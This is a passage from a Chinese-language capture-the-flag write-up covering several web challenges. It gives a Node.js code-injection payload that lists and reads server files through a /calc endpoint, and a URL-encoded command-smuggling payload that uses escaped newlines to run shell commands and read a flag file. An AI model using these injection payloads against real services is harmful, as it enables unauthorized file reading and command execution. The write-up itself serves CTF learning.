text_enc = aes.decrypt(text_enc_b64)
print(text_enc)
Web
幫趙總結婚
嗯,就是爆破 只要字典夠大
Checkin
Nodejs注入 = =
查看
/calc require('fs').readdirSync('.').toString()
讀取
/calc require('fs').readFileSync('a.js','utf-8')
Bypass
沒有過濾tac
直接 /?a=./1.php%5c&b=%20%20%20%20%20%0a%20%20id%20%0a%20a=l%20%0a%20b=s%20%0a%20%20tac%20%20./.F1jh_/h3R3_1S_your_F1A9.txt%20%0a%5c
拿到flag
。